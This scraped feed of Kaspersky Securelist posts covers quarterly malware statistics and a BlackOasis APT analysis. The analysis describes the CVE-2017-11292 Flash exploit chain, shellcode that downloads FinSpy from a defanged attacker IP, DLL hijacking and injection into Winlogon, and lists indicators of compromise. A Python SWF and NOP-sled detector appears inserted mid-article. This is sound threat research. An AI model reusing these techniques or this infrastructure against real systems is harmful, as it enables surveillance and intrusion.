The rest of the rating is populated by 'old timers' – the Trojans Locky, Cerber, Cryrar, Shade, and Spora.\n\nThe Jaff cryptor appeared in the spring of 2017, going straight into fourth place in the Q2 rating, and then stopped spreading just as suddenly.\n\n### Top 10 countries where online resources are seeded with malware\n\n_The following statistics are based on the physical location of the online resources used in attacks and blocked by our antivirus components (web pages containing redirects to exploits, sites containing exploits and other malware, botnet command centers, etc.). Any unique host could be the source of one or more web attacks. In order to determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn the third quarter of 2017, Kaspersky Lab solutions blocked **277,646,376** attacks launched from web resources located in 185 countries around the world. **72,012,219** unique URLs were recognized as malicious by web antivirus components.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-16-en.jpg>)\n\nDistribution of web attack sources by country, Q3 2017\n\nIn Q3 2017, the US (3.86%) was home to most sources of web attacks. The Netherlands (25.22%) remained in second place, while Germany moved up from fifth to third. Finland and Singapore dropped out of the top five and were replaced by Ireland (1.36%) and Ukraine (1.36%).\n\n**Countries where users faced the greatest risk of online infection**\n\nIn order to assess the risk of online infection faced by users in different countries, we calculated the percentage of Kaspersky Lab users in each country who encountered detection verdicts on their machines during the quarter. 
The resulting data provides an indication of the aggressiveness of the environment in which computers work in different countries.\n\nThis rating only includes attacks by malicious programs that fall under the **_Malware_** class. The rating does not include web antivirus module detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| | **Country*** | **% of users attacked**** \n---|---|--- \n1 | Belarus | 27.35 \n2 | Algeria | 24.23 \n3 | Russia | 23.91 \n4 | Armenia | 23.74 \n5 | Moldova | 23.61 \n6 | Greece | 21.48 \n7 | Azerbaijan | 21.14 \n8 | Kyrgyzstan | 20.83 \n9 | Uzbekistan | 20.24 \n10 | Albania | 20.10 \n11 | Ukraine | 19.82 \n12 | Kazakhstan | 19.55 \n13 | France | 18.94 \n14 | Venezuela | 18.68 \n15 | Brazil | 18.01 \n16 | Portugal | 17.93 \n17 | Vietnam | 17.81 \n18 | Tajikistan | 17.63 \n19 | Georgia | 17.50 \n20 | India | 17.43 \n \n_These statistics are based on detection verdicts returned by the web antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data._ \n_* These calculations excluded countries where the number of Kaspersky Lab users is relatively small (under 10,000 users). 
\n** Unique users whose computers have been targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky Lab products in the country._\n\nOn average, 16.61% of computers connected to the Internet globally were subjected to at least one **Malware-class** web attack during the quarter.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-17-en.jpg>)\n\nGeography of malicious web attacks in Q3 2017 (ranked by percentage of users attacked)\n\nThe countries with the safest online surfing environments included Iran (9.06%), Singapore (8.94%), Puerto Rico (6.67%), Niger (5.14%) and Cuba (4.44%).\n\n## Local threats\n\n_Local infection statistics for user computers are a very important indicator: they reflect threats that have penetrated computer systems by infecting files or removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.)._\n\n_Data in this section is based on analyzing statistics produced by antivirus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media._\n\nIn Q3 2017, Kaspersky Lab's file antivirus detected **198,228,428** unique malicious and potentially unwanted objects.\n\n**Countries where users faced the highest risk of local infection**\n\nFor each country, we calculated the percentage of Kaspersky Lab product users on whose computers the file antivirus was triggered during the quarter. These statistics reflect the level of personal computer infection in different countries.\n\nThe rating of malicious programs only includes **Malware-class** attacks. 
The rating does not include web antivirus module detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| | **Country*** | **% of users attacked**** \n---|---|--- \n1 | Yemen | 56.89 \n2 | Vietnam | 54.32 \n3 | Afghanistan | 53.25 \n4 | Uzbekistan | 53.02 \n5 | Laos | 52.72 \n6 | Tajikistan | 49.72 \n7 | Ethiopia | 48.90 \n8 | Syria | 47.71 \n9 | Myanmar | 46.82 \n10 | Cambodia | 46.69 \n11 | Iraq | 45.79 \n12 | Turkmenistan | 45.47 \n13 | Libya | 45.00 \n14 | Bangladesh | 44.54 \n15 | China | 44.40 \n16 | Sudan | 44.27 \n17 | Mongolia | 44.18 \n18 | Mozambique | 43.84 \n19 | Rwanda | 43.22 \n20 | Belarus | 42.53 \n \n_These statistics are based on detection verdicts returned by on-access and on-demand antivirus modules, received from users of Kaspersky Lab products who have consented to provide their statistical data. The data include detections of malicious programs located on users' computers or on removable media connected to the computers, such as flash drives, camera and phone memory cards, or external hard drives._ \n_* These calculations exclude countries where the number of Kaspersky Lab users is relatively small (under 10,000 users). \n** The percentage of unique users in the country with computers that blocked **Malware-class** local threats as a percentage of all unique users of Kaspersky Lab products._\n\nThis Top 20 of countries has not changed much since Q2, with the exception of China (44.40%), Syria (47.71%) and Libya (45.00%) all making an appearance. 
The proportion of users attacked in Russia amounted to 29.09%.\n\nOn average, 23.39% of computers globally faced at least one **Malware-class** local threat during the third quarter.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-18-en.jpg>)\n\nGeography of local malware attacks in Q3 2017 (ranked by percentage of users attacked)\n\n**The safest countries in terms of local infection risks** included Estonia (15.86%), Singapore (11.97%), New Zealand (9.24%), Czechia (7.89%), Ireland (6.86%) and Japan (5.79%).\n\n_All the statistics used in this report were obtained using [Kaspersky Security Network](<https://www.kaspersky.com/images/KESB_Whitepaper_KSN_ENG_final.pdf>) (KSN), a distributed antivirus network that works with various anti-malware protection components. The data was collected from KSN users who agreed to provide it. Millions of Kaspersky Lab product users from 213 countries and territories worldwide participate in this global exchange of information about malicious activity._", "modified": "2017-11-10T10:45:04", "published": "2017-11-10T10:45:04", "href": "https://securelist.com/it-threat-evolution-q3-2017-statistics/83131/", "id": "SECURELIST:376CB760FDD4E056A8D0695A9EB9756A", "type": "securelist", "title": "IT threat evolution Q3 2017. Statistics", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-10-16T15:16:55", "bulletinFamily": "blog", "cvelist": ["CVE-2015-5119", "CVE-2016-0984", "CVE-2016-4117", "CVE-2017-11292", "CVE-2017-8759"], "description": "\n\nMore information about BlackOasis APT is available to customers of Kaspersky Intelligence Reporting Service. Contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)\n\n## Introduction\n\nKaspersky Lab has always worked closely with vendors to protect users. 
As soon as we find new vulnerabilities we immediately inform the vendor in a responsible manner and provide all the details required for a fix.\n\nOn October 10, 2017, Kaspersky Lab's advanced exploit prevention systems identified a new Adobe Flash zero day exploit used in the wild against our customers. The exploit was delivered through a Microsoft Office document and the final payload was the latest version of FinSpy malware. We have reported the bug to Adobe who assigned it [CVE-2017-11292 and released a patch](<https://helpx.adobe.com/security/products/flash-player/apsb17-32.html>) earlier today:\n\n[](<https://securelist.com/files/2017/10/cve_2017_11292_credits.png>)\n\nSo far only one attack has been observed in our customer base, leading us to believe the number of attacks is minimal and highly targeted.\n\nAnalysis of the payload allowed us to confidently link this attack to an actor we track as \"BlackOasis\". We are also highly confident that BlackOasis was responsible for another zero day exploit (CVE-2017-8759) discovered by [FireEye](<https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html>) in September 2017. The FinSpy payload used in the current attacks (CVE-2017-11292) shares the same command and control (C2) server as the payload used with CVE-2017-8759 uncovered by FireEye.\n\n## BlackOasis Background\n\nWe first became aware of BlackOasis' activities in May 2016, while investigating another Adobe Flash zero day. On May 10, 2016, Adobe [warned](<https://helpx.adobe.com/security/products/flash-player/apsa16-02.html>) of a vulnerability (CVE-2016-4117) affecting Flash Player 21.0.0.226 and earlier versions for Windows, Macintosh, Linux, and Chrome OS. The vulnerability was actively being exploited in the wild.\n\nKaspersky Lab was able to identify a sample exploiting this vulnerability that was uploaded to a multi-scanner system on May 8, 2016. 
The sample, in the form of an RTF document, exploited CVE-2016-4117 to download and install a program from a remote C&C server. Although the exact payload of the attack was no longer in the C&C, the same server was hosting multiple FinSpy installation packages.\n\nLeveraging data from Kaspersky Security Network, we identified two other similar exploit chains used by BlackOasis in June 2015 which were zero days at the time. Those include CVE-2015-5119 and CVE-2016-0984, which were patched in July 2015 and February 2016 respectively. These exploit chains also delivered FinSpy installation packages.\n\nSince the discovery of BlackOasis' exploitation network, we've been tracking this threat actor with the purpose of better understanding their operations and targeting and have seen a couple dozen new attacks. Some lure documents used in these attacks are shown below:\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-1.png>)[](<https://securelist.com/files/2017/10/171016-blackoasis-2.png>)Decoy documents used in BlackOasis attacks\n\nTo summarize, we have seen BlackOasis utilizing at least five zero days since June 2015:\n\n * CVE-2015-5119 - June 2015\n * CVE-2016-0984 - June 2015\n * CVE-2016-4117 - May 2016\n * CVE-2017-8759 - Sept 2017\n * CVE-2017-11292 - Oct 2017\n\n## Attacks Leveraging CVE-2017-11292\n\nThe attack begins with the delivery of an Office document, presumably in this instance via e-mail. 
Embedded within the document is an ActiveX object which contains the Flash exploit.\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-3.png>)[](<https://securelist.com/files/2017/10/171016-blackoasis-4.png>)**Flash object in the .docx file, stored in uncompressed format**\n\nThe Flash object contains an ActionScript which is responsible for extracting the exploit using a custom packer seen in other FinSpy exploits.\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-5.png>)**Unpacking routine for SWF exploit**\n\nThe exploit is a memory corruption vulnerability that exists in the \"**com.adobe.tvsdk.mediacore.BufferControlParameters**\" class. If the exploit is successful, it will gain arbitrary read / write operations within memory, thus allowing it to execute a second stage shellcode.\n\nThe first stage shellcode contains an interesting NOP sled with alternative instructions, which was most likely designed in such a way to avoid detection by antivirus products looking for large NOP blocks inside flash files:\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-6.png>)NOP sled composed of 0x90 and 0x91 opcodes\n\nThe main purpose of the initial shellcode is to download second stage shellcode from hxxp://89.45.67[.]107/rss/5uzosoff0u.iaf.\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-7.png>)**Second stage shellcode**\n\nThe second stage shellcode will then perform the following actions:\n\n 1. Download the final payload (FinSpy) from hxxp://89.45.67[.]107/rss/mo.exe\n 2. Download a lure document to display to the victim from the same IP\n 3. Execute the payload and display the lure document\n\n### Payload - mo.exe\n\nAs mentioned earlier, the \"mo.exe\" payload (MD5: 4a49135d2ecc07085a8b7c5925a36c0a) is the newest version of Gamma International's FinSpy malware, typically sold to nation states and other law enforcement agencies to use in lawful surveillance operations. 
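Before going on to the payload, a defender-side check for the delivery stage described above, written for this page (not Kaspersky's or FinSpy's code): it opens a .docx as the OOXML zip it is, looks for a Flash (SWF) object among the ActiveX and embedded parts, and for uncompressed or zlib-compressed SWFs measures the longest run of 0x90/0x91 bytes, the mixed NOP sled seen in this exploit. The document it scans is constructed inline as a benign stand-in; the 32-byte sled threshold and the package paths checked are assumptions.

```python
"""Detection-side helper (written for this page, not Kaspersky's code):
flag a .docx that carries an embedded Flash (SWF) object and measure any
long run of 0x90/0x91 bytes inside it, the mixed NOP sled described above."""
import io
import re
import struct
import zipfile
import zlib

# An SWF starts with "FWS" (uncompressed), "CWS" (zlib) or "ZWS" (LZMA),
# then a one-byte version and a 4-byte little-endian uncompressed length.
SWF_MAGIC = re.compile(rb"[FCZ]WS")
NOP_BYTES = re.compile(rb"[\x90\x91]+")

# Assumed locations of embedded objects inside an OOXML package.
EMBED_PREFIXES = ("word/activeX/", "word/embeddings/")


def find_swfs(blob):
    """Yield (offset, kind, body) for each plausible SWF header in blob.
    body is the data after the 8-byte header, inflated when zlib-packed;
    the SWF need not sit at offset 0 (ActiveX .bin parts are OLE containers)."""
    for m in SWF_MAGIC.finditer(blob):
        off = m.start()
        if off + 8 > len(blob):
            continue
        version = blob[off + 3]
        length = struct.unpack_from("<I", blob, off + 4)[0]
        # Sanity check so random "FWS" text is not reported: SWF versions
        # are small integers and the declared length covers the header.
        if not 1 <= version <= 50 or length < 8:
            continue
        kind = blob[off:off + 3].decode("ascii")
        raw = blob[off + 8:]
        if kind == "FWS":
            body = raw[:length - 8]
        elif kind == "CWS":
            try:
                body = zlib.decompressobj().decompress(raw)
            except zlib.error:
                continue
        else:
            body = b""  # ZWS is LZMA-packed; report the header, skip the scan
        yield off, kind, body


def longest_nop_run(body):
    """Return (length, mixed) for the longest run of 0x90/0x91 bytes;
    mixed is True when the run uses both opcodes, as in the sample."""
    best, mixed = 0, False
    for m in NOP_BYTES.finditer(body):
        run = m.group()
        if len(run) > best:
            best = len(run)
            mixed = b"\x90" in run and b"\x91" in run
    return best, mixed


def scan_docx(data, sled_min=32):
    """Scan an in-memory .docx (zip bytes) and return one finding per SWF.
    sled_min (assumed threshold) marks a finding as suspicious."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if not name.startswith(EMBED_PREFIXES):
                continue
            for off, kind, body in find_swfs(z.read(name)):
                run, mixed = longest_nop_run(body)
                findings.append({"member": name, "offset": off, "kind": kind,
                                 "sled_len": run, "sled_mixed": mixed,
                                 "suspicious": run >= sled_min})
    return findings


def build_sample_docx():
    """Constructed test input, not an exploit: a minimal OOXML zip whose
    activeX1.bin holds a harmless uncompressed SWF padded with a sled."""
    sled = b"\x90\x91" * 40                        # 80 alternating bytes
    body = b"\x78\x00\x05\x5f\x00\x00\x0f\xa0\x00"  # constructed header fields
    body += b"\x00" * 16 + sled + b"\x00" * 8
    swf = b"FWS" + bytes([32]) + struct.pack("<I", 8 + len(body)) + body
    # OLE-style prefix so the SWF is not at offset 0 of the part
    part = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 120 + swf
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/activeX/activeX1.bin", part)
    return buf.getvalue()


if __name__ == "__main__":
    for finding in scan_docx(build_sample_docx()):
        print(finding)
```

A real triage pipeline would feed the flagged SWF to a proper SWF parser and an ActionScript decompiler; this check only tells you that a Flash object is present and where the sled-like bytes sit.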
This newer variant has made it especially difficult for researchers to analyze the malware due to many added anti-analysis techniques, including a custom packer and a virtual machine to execute code.\n\nThe PCODE of the virtual machine is packed with the aplib packer.\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-8.png>)**Part of packed VM PCODE**\n\nAfter unpacking, the PCODE looks like the following:\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-9.png>)**Unpacked PCODE**\n\nAfter unpacking, the virtual machine PCODE is then decrypted:\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-10.png>)**Decrypted VM PCODE**\n\nThe custom virtual machine supports a total of 34 instructions:\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-11.png>)**Example of parsed PCODE**\n\nIn this example, the \"1b\" instruction is responsible for executing native code that is specified in the parameter field.\n\nOnce the payload is successfully executed, it will proceed to copy files to the following locations:\n\n * C:\\ProgramData\\ManagerApp\\AdapterTroubleshooter.exe\n * C:\\ProgramData\\ManagerApp\\15b937.cab\n * C:\\ProgramData\\ManagerApp\\install.cab\n * C:\\ProgramData\\ManagerApp\\msvcr90.dll\n * C:\\ProgramData\\ManagerApp\\d3d9.dll\n\nThe \"AdapterTroubleshooter.exe\" file is a legitimate binary which is leveraged to use the well-known DLL search order hijacking technique. The \"d3d9.dll\" file is malicious and is loaded into memory by the legitimate binary upon execution. Once loaded, the DLL will then inject FinSpy into the Winlogon process.\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-12.png>)**Part of injected code in winlogon process**\n\nThe payload calls out to three C2 servers for further control and exfiltration of data. We have observed two of them used in the past with other FinSpy payloads. 
Most recently one of these C2 servers was used together with CVE-2017-8759 in the attacks reported by FireEye in September 2017. These IPs and other previous samples tie closely to the BlackOasis APT cluster of FinSpy activity.\n\n## Targeting and Victims\n\nBlackOasis' interests span a wide gamut of figures involved in Middle Eastern politics and verticals disproportionately relevant to the region. This includes prominent figures in the United Nations, opposition bloggers and activists, and regional news correspondents. During 2016, we observed a heavy interest in Angola, exemplified by lure documents indicating targets with suspected ties to oil, money laundering, and other illicit activities. There is also an interest in international activists and think tanks.\n\nVictims of BlackOasis have been observed in the following countries: Russia, Iraq, Afghanistan, Nigeria, Libya, Jordan, Tunisia, Saudi Arabia, Iran, Netherlands, Bahrain, United Kingdom and Angola.\n\n## Conclusions\n\nWe estimate that the attack on HackingTeam in mid-2015 left a gap on the market for surveillance tools, which is now being filled by other companies. One of these is Gamma International with their FinFisher suite of tools. Although Gamma International itself was hacked by Phineas Fisher in 2014, the breach was not as serious as it was in the case of HackingTeam. 
Additionally, Gamma had two years to recover from the attack and pick up the pace.\n\nWe believe the number of attacks relying on FinFisher software, supported by zero day exploits such as the ones described here, will continue to grow.\n\nWhat does this mean for everyone, and how can such attacks, including zero-day exploits, be defended against?\n\nFor CVE-2017-11292 and other similar vulnerabilities, one can use [the killbit](<https://answers.microsoft.com/en-us/windows/forum/windows_8-update/flashplayer-updates/cd258a3f-cd87-4ea9-bdb6-074d06ad491e?auth=1>) for Flash within their organizations to disable it in any applications that respect it. Unfortunately, doing this system-wide is not easily done, as Flash objects can be loaded in applications that potentially do not follow the killbit. Additionally, this may break any other necessary resources that rely on Flash and, of course, it will not protect against exploits for other third party software.\n\nDeploying a multi-layered approach including access policies, anti-virus, network monitoring and whitelisting can help ensure customers are protected against threats such as this. Users of Kaspersky products are also protected against this threat by one of the following detections:\n\n * PDM:Exploit.Win32.Generic\n * HEUR:Exploit.SWF.Generic\n * HEUR:Exploit.MSOffice.Generic\n\nMore information about BlackOasis APT is available to customers of Kaspersky Intelligence Reporting Service. Contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)\n\n## Acknowledgements\n\nWe would like to thank the Adobe Product Security Incident Response Team (PSIRT) for working with us to identify and patch this vulnerability.\n\n## References\n\n 1. 
Adobe Bulletin <https://helpx.adobe.com/security/products/flash-player/apsb17-32.html>\n\n## Indicators of compromise\n\n4a49135d2ecc07085a8b7c5925a36c0a \n89.45.67[.]107", "modified": "2017-10-16T14:28:47", "published": "2017-10-16T14:28:47", "id": "SECURELIST:56D279C45B0C4431FBA76FDF2EC365A1", "href": "https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/", "title": "BlackOasis APT and new targeted attacks leveraging zero-day exploit", "type": "securelist", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-05-15T21:13:49", "bulletinFamily": "blog", "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-0802", "CVE-2018-4878"], "description": "\n\n## Q1 figures\n\nAccording to KSN: \n\n * Kaspersky Lab solutions blocked 796,806,112 attacks launched from online resources located in 194 countries across the globe.\n * 282,807,433 unique URLs were recognized as malicious by Web Anti-Virus components.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 204,448 users.\n * Ransomware attacks were registered on the computers of 179,934 unique users.\n * Our File Anti-Virus logged 187,597,494 unique malicious and potentially unwanted objects.\n * Kaspersky Lab products for mobile devices detected: \n * 1,322,578 malicious installation packages\n * 18,912 installation packages for mobile banking Trojans\n * 8,787 installation packages for mobile ransomware Trojans\n\n## Mobile threats\n\n### Q1 events\n\nIn Q1 2018, DNS-hijacking, a new in-the-wild method for spreading mobile malware on Android devices, was identified. As a result of hacked routers and modified DNS settings, users were redirected to IP addresses belonging to the cybercriminals, where they were prompted to download malware disguised, for example, as browser updates. 
That is how the Korean banking Trojan Wroba was [distributed](<https://securelist.com/roaming-mantis-uses-dns-hijacking-to-infect-android-smartphones/85178/>).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171226/180511-it-threats-q1-18-statistics-1.png>)\n\n_This malicious resource shows a fake window while displaying the legitimate site in the address bar_\n\nIt wasn't a [drive-by-download](<https://securelist.com/threats/drive-by-attack-glossary/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) case, since the success of the attack largely depended on actions by the victim, such as installing and running the Trojan. But it's interesting to note that some devices (routers) were used to attack other devices (smartphones), all sprinkled with social engineering to make it more effective.\n\nHowever, a far greater splash in Q1 was caused by the creators of a seemingly legitimate app called GetContact.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171508/180511-it-threats-q1-18-statistics-21.png>)\n\nSome backstory to begin with. Various families and classes of malicious apps are known to gather data from infected devices: it could be a relatively harmless IMEI number, phone book contents, SMS correspondence, or even WhatsApp chats. All the above (and much more besides) is personal information that only the mobile phone owner should have control over. However, the creators of GetContact concocted a license agreement giving them the right to download the user's phone book to their servers and grant all their subscribers access to it. As a result, anyone could find out what name GetContact users had saved their phone number under, often with sad consequences. 
Let's hope that the app creators had the noble intention of [protecting users from telephone spam and fraudulent calls](<https://callerid.kaspersky.com/?lang=ru>), but simply chose the wrong means to do so.\n\n### Mobile threat statistics\n\nIn Q1 2018, Kaspersky Lab detected 1,322,578 malicious installation packages, down 11% against the previous quarter.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171235/180511-it-threats-q1-18-statistics-4.png>)\n\n_Number of detected malicious installation packages, Q2 2017 \u2013 Q1 2018_\n\n#### Distribution of detected mobile apps by type\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171244/180511-it-threats-q1-18-statistics-5.png>)\n\n_Distribution of newly detected mobile apps by type, Q4 2017 and Q1 2018 _\n\nAmong all the threats detected in Q1 2018, the lion's share belonged to potentially unwanted RiskTool apps (49.3%); compared to the previous quarter, their share fell by 5.5%. Members of the RiskTool.AndroidOS.SMSreg family contributed most to this indicator.\n\nSecond place was taken by Trojan-Dropper threats (21%), whose share doubled. Most detected files of this type came from the Trojan-Dropper.AndroidOS.Piom family.\n\nAdvertising apps, which ranked second in Q4 2017, dropped a place\u2014their share decreased by 8%, accounting for 11% of all detected threats.\n\nOn a separate note, Q1 saw a rise in the share of mobile banking threats. 
This was due to the mass distribution of Trojan-Banker.AndroidOS.Faketoken.z.\n\n#### TOP 20 mobile malware\n\n_Note that this malware rating does not include potentially dangerous or unwanted programs such as RiskTool and Adware._\n\n| | Verdict | %* \n---|---|--- \n1 | DangerousObject.Multi.Generic | 70.17 \n2 | Trojan.AndroidOS.Boogr.gsh | 12.92 \n3 | Trojan.AndroidOS.Agent.rx | 5.55 \n4 | Trojan-Dropper.AndroidOS.Lezok.p | 5.23 \n5 | Trojan-Dropper.AndroidOS.Hqwar.ba | 2.95 \n6 | Trojan.AndroidOS.Triada.dl | 2.94 \n7 | Trojan-Dropper.AndroidOS.Hqwar.i | 2.51 \n8 | Trojan.AndroidOS.Piom.rfw | 2.13 \n9 | Trojan-Dropper.AndroidOS.Lezok.t | 2.06 \n10 | Trojan.AndroidOS.Piom.pnl | 1.78 \n11 | Trojan-Dropper.AndroidOS.Agent.ii | 1.76 \n12 | Trojan-SMS.AndroidOS.FakeInst.ei | 1.64 \n13 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.50 \n14 | Trojan-Ransom.AndroidOS.Zebt.a | 1.48 \n15 | Trojan.AndroidOS.Piom.qmx | 1.47 \n16 | Trojan.AndroidOS.Dvmap.a | 1.40 \n17 | Trojan-SMS.AndroidOS.Agent.xk | 1.35 \n18 | Trojan.AndroidOS.Triada.snt | 1.24 \n19 | Trojan-Dropper.AndroidOS.Lezok.b | 1.22 \n20 | Trojan-Dropper.AndroidOS.Tiny.d | 1.22 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked._\n\nAs before, first place in our TOP 20 went to DangerousObject.Multi.Generic (70.17%), the verdict we use for malware detected [using cloud technologies](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). Cloud technologies work when the anti-virus databases lack data for detecting a piece of malware, but the cloud of the anti-virus company already contains information about the object. This is basically how the latest malicious programs are detected.\n\nIn second place was Trojan.AndroidOS.Boogr.gsh (12.92%). 
This verdict is given to files recognized as malicious by our system based on [machine learning](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>).\n\nThird was Trojan.AndroidOS.Agent.rx (5.55%). Operating in background mode, this Trojan's task is to covertly visit web pages as instructed by its C&C.\n\nFourth and fifth places went to the Trojan _matryoshkas_ Trojan-Dropper.AndroidOS.Lezok.p (5.2%) and Trojan-Dropper.AndroidOS.Hqwar.ba (2.95%), respectively. Note that in Q1 threats like Trojan-Dropper effectively owned the TOP 20, occupying eight positions in the rating. The main tasks of such droppers are to drop a payload on the victim, avoid detection by security software, and complicate the reverse engineering process. In the case of Lezok, an aggressive advertising app acts as the payload, while Hqwar can conceal a banking Trojan or ransomware.\n\nSixth place in the rating was taken by the unusual Trojan Triada.dl (2.94%) from the [Trojan.AndroidOS.Triada](<https://threats.kaspersky.com/en/threat/Trojan.AndroidOS.Triada/>) family of modular-designed malware, which we have written about many times. The Trojan was notable for its highly sophisticated attack vector: it modified the main system library libandroid_runtime.so so that malicious code started when any debugging output was written to the system event log. Devices with the modified library ended up on store shelves, thus ensuring that the infection began early. The capabilities of Triada.dl are almost limitless: it can be embedded in apps already installed and pinch data from them, and it can show the user fake data in \"clean\" apps.\n\nThe Trojan ransomware Trojan-Ransom.AndroidOS.Zebt.a (1.48%) finished 14th. It features a quaint set of functions, including hiding the icon at startup and requesting device administrator rights to counteract deletion. 
Like other such mobile ransomware, the malware is distributed under the guise of a porn app.\n\nAnother interesting resident in the TOP 20 is Trojan-SMS.AndroidOS.Agent.xk (1.35%), which operates like the SMS Trojans of 2011. The malware displays a welcome screen offering various services, generally access to content. At the bottom in fine print it is written that the services are fee-based and subscription to them is via SMS.\n\n#### Geography of mobile threats\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171253/180511-it-threats-q1-18-statistics-6.png>)\n\n_Map of attempted infections using mobile malware in Q1 2018 (percentage of attacked users in the country)_\n\nTOP 10 countries by share of users attacked by mobile malware:\n\n| | Country* | %** \n---|---|--- \n1 | China | 34.43 \n2 | Bangladesh | 27.53 \n3 | Nepal | 27.37 \n4 | Ivory Coast | 27.16 \n5 | Nigeria | 25.36 \n6 | Algeria | 24.13 \n7 | Tanzania | 23.61 \n8 | India | 23.27 \n9 | Indonesia | 22.01 \n10 | Kenya | 21.45 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000). \n** Unique users attacked in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nIn Q1 2018, China (34.43%) topped the list by share of mobile users attacked. Note that China is a regular fixture in the TOP 10 rating by number of attacked users: It came sixth in 2017, and fourth in 2016. As in 2017, second place was claimed by Bangladesh (27.53%). 
The biggest climber was Nepal (27.37%), rising from ninth place last year to third.\n\nRussia (8.18%) this quarter was down in 39th spot, behind Qatar (8.22%) and Vietnam (8.48%).\n\nThe safest countries (based on proportion of mobile users attacked) are Denmark (1.85%) and Japan (1%).\n\n#### Mobile banking Trojans\n\nIn the reporting period, we detected **18,912** installation packages for mobile banking Trojans, which is 1.3 times more than in Q4 2017.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171304/180511-it-threats-q1-18-statistics-7.png>)\n\n_Number of installation packages for mobile banking Trojans detected by Kaspersky Lab, Q2 2017 \u2013 Q1 2018_\n\n| | Verdict | %* \n---|---|--- \n1 | Trojan-Banker.AndroidOS.Asacub.bj | 12.36 \n2 | Trojan-Banker.AndroidOS.Svpeng.q | 9.17 \n3 | Trojan-Banker.AndroidOS.Asacub.bk | 7.82 \n4 | Trojan-Banker.AndroidOS.Svpeng.aj | 6.63 \n5 | Trojan-Banker.AndroidOS.Asacub.e | 5.93 \n6 | Trojan-Banker.AndroidOS.Hqwar.t | 5.38 \n7 | Trojan-Banker.AndroidOS.Faketoken.z | 5.15 \n8 | Trojan-Banker.AndroidOS.Svpeng.ai | 4.54 \n9 | Trojan-Banker.AndroidOS.Agent.di | 4.31 \n10 | Trojan-Banker.AndroidOS.Asacub.ar | 3.52 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked by banking threats._\n\nThe most popular mobile banking Trojan in Q1 was Asacub.bj (12.36%), nudging ahead of second-place Svpeng.q (9.17%). Both these Trojans use phishing windows to steal bank card and authentication data for online banking. They also steal money through SMS services, including mobile banking.\n\nNote that the TOP 10 mobile banking threats in Q1 is largely made up of members of the Asacub (4 out of 10) and Svpeng (3 out of 10) families. However, Trojan-Banker.AndroidOS.Faketoken.z also entered the list. 
